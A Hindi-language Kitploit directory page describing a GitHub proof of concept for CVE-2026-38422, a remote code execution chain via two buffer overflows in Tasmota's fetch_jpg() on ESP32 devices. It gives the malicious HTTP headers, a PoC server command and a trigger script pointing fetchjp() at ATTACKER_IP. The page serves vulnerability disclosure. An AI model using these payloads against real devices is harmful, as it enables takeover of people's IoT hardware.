Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-38422 — CVE-2026-38422 — Remote Code Execution via Combined Buffer Overflows in Tasmota fetch_jpg() (Tasmota <= 15.3.0.3) | Kitploit
उपकरण/GitHubGitHub/sermikr0/cve-2026-38422
Embedded Systems SecurityIoT SecurityVulnerability AnalysisExploitationPenetration TestingHardware & IoT SecurityRemote Access ToolBinary Exploitation
GitHubsermikr0/cve-2026-38422

CVE-2026-38422

CVE-2026-38422 — Remote Code Execution via Combined Buffer Overflows in Tasmota fetch_jpg() (Tasmota <= 15.3.0.3)

रिपॉजिटरी देखें
2 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-38422: Tasmota fetch_jpg() में संयुक्त बफर ओवरफ्लो के माध्यम से रिमोट कोड निष्पादन

CVE: CVE-2026-38422
गंभीरता: क्रिटिकल (CVSS 9.8)
उत्पाद: Arendst Tasmota
प्रभावित संस्करण: <= 15.3.0.3
फ़ाइल: tasmota/tasmota_xdrv_driver/xdrv_10_scripter.ino
फ़ंक्शन: fetch_jpg()
लेखक: Saidakbarxon Maxsudxonov
प्रकटीकरण: जिम्मेदार — प्रकाशन से पहले Tasmota को रिपोर्ट किया गया


सारांश

Tasmota के स्क्रिप्टर ड्राइवर (xdrv_10_scripter.ino) में fetch_jpg() फ़ंक्शन में दो संयुक्त मेमोरी भ्रष्टाचार कमजोरियाँ हैं, जो एक साथ Tasmota <= 15.3.0.3 चलाने वाले ESP32-आधारित उपकरणों पर रिमोट कोड निष्पादन को सक्षम बनाती हैं:

  1. चरण 1 (केस 0): एक निश्चित 40-बाइट boundary[] बफर में strcpy() ओवरफ्लो — WiFiClient/HTTPClient vtable पॉइंटर्स सहित आसन्न हीप मेमोरी को दूषित करता है (CVE-2026-38426 भी देखें)
  2. चरण 2 (केस 2): Content-Length पर uint16_t पूर्णांक रैपअराउंड — छोटे बफर के लिए आवंटन जो स्ट्रीम स्थिति भ्रष्टाचार का कारण बनता है (CVE-2026-38427 भी देखें)

एकल हमले सत्र में एक साथ उपयोग किए जाने पर, ये दो प्रिमिटिव हीप भ्रष्टाचार को अधिकतम करते हैं और मनमाना कोड निष्पादन प्राप्त करने की संभावना को काफी बढ़ा देते हैं।


भेद्यता श्रृंखला

root@kitploit:~
Attacker MJPEG Server
       │
       │ Phase 1: HTTP 200 response with long boundary string
       │   Content-Type: multipart/x-mixed-replace; boundary=AAAA...AAAA (50+ chars)
       │   → strcpy(boundary[40], 50_chars) → OVERFLOW
       │   → WiFiClient vtable ptr partially overwritten
       ▼
  ESP32 Heap Corrupted
       │
       │ Phase 2: MJPEG frame with Content-Length > 65535
       │   Content-Length: 65537
       │   → uint16_t size = 1 (wraparound)
       │   → malloc(1), readBytes(buff, 1)
       │   → 65536 bytes remain in stream → heap/stream corruption
       ▼
  Double Corruption → RCE / Guaranteed DoS

प्रूफ ऑफ कॉन्सेप्ट

root@kitploit:~
# Combined attack — phase 1 + phase 2
python3 CVE-2026-38422_poc.py --port 8887 --mode dos

PoC सर्वर:

  1. Tasmota (fetchjp() ट्रिगर) से कनेक्शन स्वीकार करता है
  2. चरण 1: 80 अक्षरों की सीमा स्ट्रिंग के साथ प्रारंभिक HTTP 200 भेजता है (ओवरफ्लो)
  3. चरण 2: Content-Length: 65537 के साथ MJPEG फ्रेम भेजता है (रैपअराउंड)

पूर्ण कार्यान्वयन के लिए CVE-2026-38422_poc.py देखें।


Tasmota स्क्रिप्ट के माध्यम से ट्रिगर

root@kitploit:~
>D
>B
fetchjp(ATTACKER_IP:8887/stream,0,0,1)
>1
=fetchjp(2,0,0,1)

डिवाइस पर fetchjp() का उपयोग करने वाली Tasmota स्क्रिप्ट चल रही होनी चाहिए। हमलावर उस सर्वर को नियंत्रित करता है जिससे डिवाइस कनेक्ट होता है (या मौजूदा कनेक्शन पर MITM करता है)।


प्रभाव

  • गोपनीयता: उच्च — ESP32 पर RCE, डिवाइस रहस्य/क्रेडेंशियल तक पहुंच
  • अखंडता: उच्च — पूर्ण डिवाइस अधिग्रहण
  • उपलब्धता: उच्च — गारंटीकृत क्रैश/रीबूट लूप
  • हमला वेक्टर: नेटवर्क (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
  • CVSS स्कोर: 9.8 क्रिटिकल

प्रभावित डिवाइस

कोई भी ESP32-आधारित Tasmota डिवाइस जो संस्करण <= 15.3.0.3 चला रहा है, जिसमें स्क्रिप्टर समर्थन सक्षम है और एक स्क्रिप्ट जो बाहरी MJPEG सर्वर से कनेक्ट करने के लिए fetchjp() का उपयोग करती है।


समयरेखा

  • 2026-03-29: दोनों कमजोरियां खोजी गईं और MITRE को रिपोर्ट की गईं
  • 2026-03-29: CVE-2026-38422 आवंटित
  • 2026-05-xx: Tasmota द्वारा पैच जारी (v15.3.0.4+)

संदर्भ

  • Tasmota GitHub
  • xdrv_10_scripter.ino
  • CVE-2026-38422
  • संबंधित: CVE-2026-38426 (strcpy ओवरफ्लो)
  • संबंधित: CVE-2026-38427 (uint16_t रैपअराउंड)
टूल डाउनलोड करें